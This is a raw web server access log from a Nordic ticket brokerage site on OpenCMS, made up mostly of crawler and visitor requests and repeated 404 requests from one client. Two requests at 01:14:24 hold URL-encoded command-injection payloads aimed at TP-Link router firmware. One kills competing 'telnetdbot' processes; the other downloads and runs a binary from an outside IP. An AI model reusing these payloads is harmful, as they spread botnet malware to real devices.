47.128.32.125 - - [19/Jun/2024:01:12:33 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.32.125 - - [19/Jun/2024:01:12:33 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
157.55.39.8 - - [19/Jun/2024:01:12:34 +0200] "GET /ticket2/opencms/en/venue/?venueid=ADCD705E-60C1-B5B7-06CB-C114610D2494 HTTP/1.1" 200 71315
47.128.32.125 - - [19/Jun/2024:01:12:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.32.125 - - [19/Jun/2024:01:12:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.32.125 - - [19/Jun/2024:01:12:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.32.125 - - [19/Jun/2024:01:12:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.32.125 - - [19/Jun/2024:01:12:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
95.91.110.20 - - [19/Jun/2024:01:12:36 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=F8B6926A-3DA5-3449-0D9B-7E103703EFF6&sortorder=desc&column=price HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:12:40 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=F8C63DF8-590C-CC78-749C-C6B01C8C3C13 HTTP/1.1" 404 -
149.202.86.56 - - [19/Jun/2024:01:12:40 +0200] "GET /ticket2/opencms/se/robots.txt HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:12:43 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=F8EC1E27-5FC0-2FC2-B1D4-59233AB1F01F&sortorder=desc&column=price HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:12:47 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=F8EC1E27-5FC0-2FC2-B1D4-59233AB1F01F&sortorder=desc&column=row HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:12:51 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=F8EC1E27-5FC0-2FC2-B1D4-59233AB1F01F&sortorder=desc&column=section HTTP/1.1" 404 -
216.244.66.238 - - [19/Jun/2024:01:12:52 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
216.244.66.238 - - [19/Jun/2024:01:12:52 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
95.91.110.20 - - [19/Jun/2024:01:12:54 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=F920C9EB-FBBB-08CB-045F-AA52A8ABB18F HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:12:58 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=F98A7298-B6AE-74CA-1979-60ECE40631DA&sortorder=desc&column=row HTTP/1.1" 404 -
149.202.86.56 - - [19/Jun/2024:01:13:01 +0200] "GET /ticket2/opencms/se/sv/login/?edid=124781BD-55D1-347C-3E0C-E088BD538B9A HTTP/1.1" 404 -
185.191.171.11 - - [19/Jun/2024:01:13:05 +0200] "GET /ticket2/opencms/de/magazine/article?title=nottingham-forest HTTP/1.1" 200 73831
95.91.110.20 - - [19/Jun/2024:01:13:05 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=F9C28169-9DB0-FD34-41D7-E143F8F4A5B7&sortorder=desc&column=section HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:13:09 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FB228F49-43F5-8157-1817-3F547B5538EF&sortorder=desc&column=section HTTP/1.1" 404 -
149.202.86.56 - - [19/Jun/2024:01:13:10 +0200] "GET /ticket2/opencms/se/robots.txt HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:13:12 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FB3C343C-6AB6-461F-8218-82B4CC353AD4&sortorder=desc&column=price HTTP/1.1" 404 -
114.119.148.108 - - [19/Jun/2024:01:13:12 +0200] "GET /ticket2/opencms/en/sell/?edid=F5BFC35C-9252-8495-D0AB-4A5E2C07EBBC HTTP/1.1" 302 -
95.91.110.20 - - [19/Jun/2024:01:13:15 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FB3C343C-6AB6-461F-8218-82B4CC353AD4&sortorder=desc&column=section HTTP/1.1" 404 -
114.119.148.108 - - [19/Jun/2024:01:13:17 +0200] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 73431
95.91.110.20 - - [19/Jun/2024:01:13:19 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FCA72846-635B-B656-1D41-380F35E6AF6B&sortorder=desc&column=price HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:13:23 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FCA72846-635B-B656-1D41-380F35E6AF6B&sortorder=desc&column=section HTTP/1.1" 404 -
149.202.86.56 - - [19/Jun/2024:01:13:26 +0200] "GET /ticket2/opencms/se/sv/login?amp HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:13:27 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FD9F7521-FAF6-CC18-E57A-C791478603D9 HTTP/1.1" 404 -
85.208.96.206 - - [19/Jun/2024:01:13:29 +0200] "GET /ticket2/opencms/en/sport/football-tickets/serie_a/empoli/ HTTP/1.1" 200 72521
95.91.110.20 - - [19/Jun/2024:01:13:30 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FDEB7C2D-C2DD-0C61-E47E-B640A2277142 HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:13:34 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FDF79470-7ABA-EC81-F653-55487B859239 HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:13:38 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FDF79470-7ABA-EC81-F653-55487B859239&sortorder=desc&column=price HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:13:41 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FDF79470-7ABA-EC81-F653-55487B859239&sortorder=desc&column=row HTTP/1.1" 404 -
92.34.170.88 - - [19/Jun/2024:01:13:42 +0200] "GET /ticket2/opencms/sv/buying_tickets HTTP/1.1" 200 74036
92.34.170.88 - - [19/Jun/2024:01:13:43 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/images/event-banner.png HTTP/1.1" 404 -
92.34.170.88 - - [19/Jun/2024:01:13:43 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:13:45 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FDF79470-7ABA-EC81-F653-55487B859239&sortorder=desc&column=section HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:13:48 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FE398368-2010-F35D-8A07-B0FC2E973E08 HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:13:52 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FE84BAFC-CCB6-50CE-4161-D28C42F593C7 HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:13:56 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FE84BAFC-CCB6-50CE-4161-D28C42F593C7&sortorder=desc&column=price HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:14:00 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FE84BAFC-CCB6-50CE-4161-D28C42F593C7&sortorder=desc&column=row HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:14:03 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FEB4F54E-22CA-FAFF-43DE-5DFA194E61AA HTTP/1.1" 404 -
216.245.221.83 - - [19/Jun/2024:01:14:11 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
95.91.110.20 - - [19/Jun/2024:01:14:11 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FEB4F54E-22CA-FAFF-43DE-5DFA194E61AA&sortorder=asc&column=price HTTP/1.1" 404 -
216.245.221.83 - - [19/Jun/2024:01:14:11 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
85.208.96.198 - - [19/Jun/2024:01:14:13 +0200] "GET /ticket2/opencms/fi/urheilu/jalkapallo/la-liga/girona/ HTTP/1.1" 200 74072
95.91.110.20 - - [19/Jun/2024:01:14:15 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FEB4F54E-22CA-FAFF-43DE-5DFA194E61AA&sortorder=asc&column=row HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:14:19 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FEB4F54E-22CA-FAFF-43DE-5DFA194E61AA&sortorder=asc&column=section HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:14:23 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FEB4F54E-22CA-FAFF-43DE-5DFA194E61AA&sortorder=desc&column=price HTTP/1.1" 404 -
45.148.10.174 - - [19/Jun/2024:01:14:24 +0200] "GET /ticket2/opencms/de/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%253E%2560for+proc_dir+in+%252Fproc%252F%255B0-9%255D%252A%253B+do+pid%253D%2524%257Bproc_dir%2523%2523%252A%252F%257D%253B+buffer%253D%2524%2528cat+%2522%252Fproc%252F%2524pid%252Fmaps%2522%2529%253B+if+%255B+%2522%2524%257B%2523buffer%257D%2522+-gt+1+%255D%253B+then+if+%255B+%2522%2524%257Bbuffer%2523%252A%2522%252Flib%252F%2522%257D%2522+%253D+%2522%2524buffer%2522+%255D+%2526%2526+%255B+%2522%2524%257Bbuffer%2523%252A%2522telnetdbot%2522%257D%2522+%253D+%2522%2524buffer%2522+%255D%253B+then+kill+-9+%2522%2524pid%2522%253B+fi%253B+fi%253B+done%2560) HTTP/1.1" 404 -
45.148.10.174 - - [19/Jun/2024:01:14:24 +0200] "GET /ticket2/opencms/de/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%253E%2560cd+%252Ftmp%253B+rm+-rf+shk%253B+wget+http%253A%252F%252F45.148.10.78%252Fshk%253B+chmod+777+shk%253B+.%252Fshk+tplink%253B+rm+-rf+shk%2560) HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:14:26 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FEB4F54E-22CA-FAFF-43DE-5DFA194E61AA&sortorder=desc&column=section HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:14:30 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FEC9AA90-29F7-1503-8F87-89F5FA01BC28 HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:14:33 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FEC9AA90-29F7-1503-8F87-89F5FA01BC28&sortorder=desc&column=row HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:14:36 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FF0D3809-EDF7-7D77-577F-435AF719EB43&sortorder=asc&column=section HTTP/1.1" 404 -
114.119.138.151 - - [19/Jun/2024:01:14:37 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=6D50B552-8DF2-5938-F1F3-FA545E96FE9F HTTP/1.1" 200 85194
95.91.110.20 - - [19/Jun/2024:01:14:40 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FF2B86C5-202C-F6A1-F44E-1F4D4F393656 HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:14:44 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FFB17C01-ED75-27AF-8C5A-B4FCC8F6A8DC HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:14:47 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FFB17C01-ED75-27AF-8C5A-B4FCC8F6A8DC&sortorder=desc&column=price HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:14:51 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FFD295A3-4EEF-0AC4-F4B4-46E2317B286E HTTP/1.1" 404 -
47.128.96.163 - - [19/Jun/2024:01:14:52 +0200] "GET /ticket2/opencms/fi/buy/?catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&eventid=04745230-C0F0-DC87-23F9-862A2DFE2F25&page=7 HTTP/1.1" 200 98572
47.128.96.163 - - [19/Jun/2024:01:14:53 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.96.163 - - [19/Jun/2024:01:14:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.96.163 - - [19/Jun/2024:01:14:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
95.91.110.20 - - [19/Jun/2024:01:14:54 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FFD295A3-4EEF-0AC4-F4B4-46E2317B286E&sortorder=desc&column=row HTTP/1.1" 404 -
47.128.96.163 - - [19/Jun/2024:01:14:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.96.163 - - [19/Jun/2024:01:14:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.96.163 - - [19/Jun/2024:01:14:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.96.163 - - [19/Jun/2024:01:14:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
95.91.110.20 - - [19/Jun/2024:01:14:58 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=FFD295A3-4EEF-0AC4-F4B4-46E2317B286E&sortorder=desc&column=section HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:15:01 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=10&eventid=8089A138-5EE7-E43F-C342-AAB9352CA1D1&venueid=152137BD-51FA-C49F-6002-B503D5181B54 HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:15:05 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=10&eventid=9464EBD2-6392-C534-AC79-AC37A4AB6BC5&venueid=66B7684A-34D7-B171-288C-D950D3063FA0 HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:15:09 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=10&eventid=F94E6C2D-EE24-943A-6050-187B4C0ADF9D&venueid=99EB5D09-9A33-95A7-F158-1EC6D2BA2BAD HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:15:16 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=36394212-F82E-F845-399B-42BED55969CC&eventid=44A1774B-7690-4041-831D-F16B9B8104AB HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:15:20 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=5A89E483-58AD-080E-F363-E16CE738916A&eventid=3626A144-441F-96DC-80B9-21C305D20D6C HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:15:24 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=5A89E483-58AD-080E-F363-E16CE738916A&eventid=4798C875-B602-9765-2D42-90861D6A4B84 HTTP/1.1" 404 -
66.249.75.41 - - [19/Jun/2024:01:15:26 +0200] "GET /ticket2/opencms/en/standard/ HTTP/1.1" 200 84557
95.91.110.20 - - [19/Jun/2024:01:15:29 +0200] "GET /ticket2/opencms/dk/sv/buy/?comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76&catid=1DB7F66B-473B-B427-F752-358FEEFE8EC0 HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:15:30 +0200] "GET /ticket2/opencms/dk/robots.txt HTTP/1.1" 404 -
85.208.96.196 - - [19/Jun/2024:01:15:35 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/la_liga/real_madrid/ HTTP/1.1" 200 75337
95.91.110.20 - - [19/Jun/2024:01:15:35 +0200] "GET /ticket2/opencms/dk/sv/buy/?id=&npage=3 HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:15:41 +0200] "GET /ticket2/opencms/dk/sv/buy/?id=&npage=5 HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:15:47 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=00064114-6BE1-CCCB-97F5-56A3163EE9EF HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:15:52 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=010D1DBC-676F-1EC3-4C55-6CE905E100DB HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:15:58 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=010D8BDA-8FD2-5B46-05AE-B4EDB44FA38A HTTP/1.1" 404 -
114.119.159.6 - - [19/Jun/2024:01:16:01 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=591C3A37-3E17-0F4C-661A-7A1C2624C09B HTTP/1.1" 200 85215
95.91.110.20 - - [19/Jun/2024:01:16:03 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=01148208-C5C5-644D-6BB7-97FA6BDD0B48 HTTP/1.1" 404 -
216.245.221.83 - - [19/Jun/2024:01:16:08 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
95.91.110.20 - - [19/Jun/2024:01:16:09 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=01148208-C5C5-644D-6BB7-97FA6BDD0B48&sortorder=asc&column=section HTTP/1.1" 404 -
216.245.221.83 - - [19/Jun/2024:01:16:14 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
95.91.110.20 - - [19/Jun/2024:01:16:14 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=01148208-C5C5-644D-6BB7-97FA6BDD0B48&sortorder=desc&column=price HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:16:27 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=01148208-C5C5-644D-6BB7-97FA6BDD0B48&sortorder=desc&column=row HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:16:33 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=01148208-C5C5-644D-6BB7-97FA6BDD0B48&sortorder=desc&column=section HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:16:38 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=0116FCC4-F00F-0C90-5340-21E4C3FAA3BB HTTP/1.1" 404 -
40.77.167.4 - - [19/Jun/2024:01:16:39 +0200] "GET /ticket2/opencms/se/sv/venue/?venueid=E6D4C5C5-380D-4772-E0D1-58201DC9D2A9 HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:16:44 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=0116FCC4-F00F-0C90-5340-21E4C3FAA3BB&sortorder=asc&column=row HTTP/1.1" 404 -
93.160.177.14 - - [19/Jun/2024:01:16:46 +0200] "GET /ticket2/opencms/set_aff_cookie.jsp?partner=53673ED6-1455-FA54-818F-B1F67121E37C&url=/dk/buy/index.html%3Fpage%3D1%26edid%3D72E82760-BEC3-3CF9-6E90-2FDD50852364%26hlv%3D666d44d3-a96c-42d3-80dc-5bd20a01000f%23v1899666353 HTTP/1.1" 200 225
93.160.177.14 - - [19/Jun/2024:01:16:46 +0200] "GET /ticket2/opencms/dk/buy/?page=1&edid=72E82760-BEC3-3CF9-6E90-2FDD50852364&hlv=666d44d3-a96c-42d3-80dc-5bd20a01000f HTTP/1.1" 200 111965
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/calendar.css HTTP/1.1" 200 6871
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery-ui.css HTTP/1.1" 200 33221
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/standard.css HTTP/1.1" 200 71935
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery.fancybox.css HTTP/1.1" 200 4939
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery.js HTTP/1.1" 200 93868
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery-ui.js HTTP/1.1" 200 228088
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/stickyfill.min.js HTTP/1.1" 200 5672
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.fancybox.pack.js HTTP/1.1" 200 23187
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/img/icons/se.png HTTP/1.1" 200 1258
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/img/icons/no.png HTTP/1.1" 200 1958
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/img/icons/dk.png HTTP/1.1" 200 1706
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/img/icons/fi.png HTTP/1.1" 200 1785
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.placeholder.min.js HTTP/1.1" 200 1737
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/common-ajax.js HTTP/1.1" 200 20175
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/img/icons/nl.png HTTP/1.1" 200 1255
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/img/insta.png HTTP/1.1" 200 3967
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/img/fb.png HTTP/1.1" 200 1269
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/venue/stamford_bridge.png HTTP/1.1" 200 51972
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/0.gif HTTP/1.1" 200 43
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/two_man.png HTTP/1.1" 200 3407
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/ticket_info_button.png HTTP/1.1" 200 3820
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/dk/ask-form.html HTTP/1.1" 200 2971
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/img/check.png HTTP/1.1" 200 548
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/img/mail.png HTTP/1.1" 200 403
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/img/chat.png HTTP/1.1" 200 416
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/img/arrow.png HTTP/1.1" 200 753
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/img/arrow-down.png HTTP/1.1" 200 192
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/img/icons/nl.png HTTP/1.1" 200 1255
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/dk/ask-form.html HTTP/1.1" 200 2971
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/img/icons/fr.png HTTP/1.1" 200 1764
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/img/icons/de.png HTTP/1.1" 200 1124
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/img/icons/es.png HTTP/1.1" 200 1005
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/img/icons/globe-white.png HTTP/1.1" 200 947
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/img/icons/en.png HTTP/1.1" 200 2415
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/img/icons/it.png HTTP/1.1" 200 2040
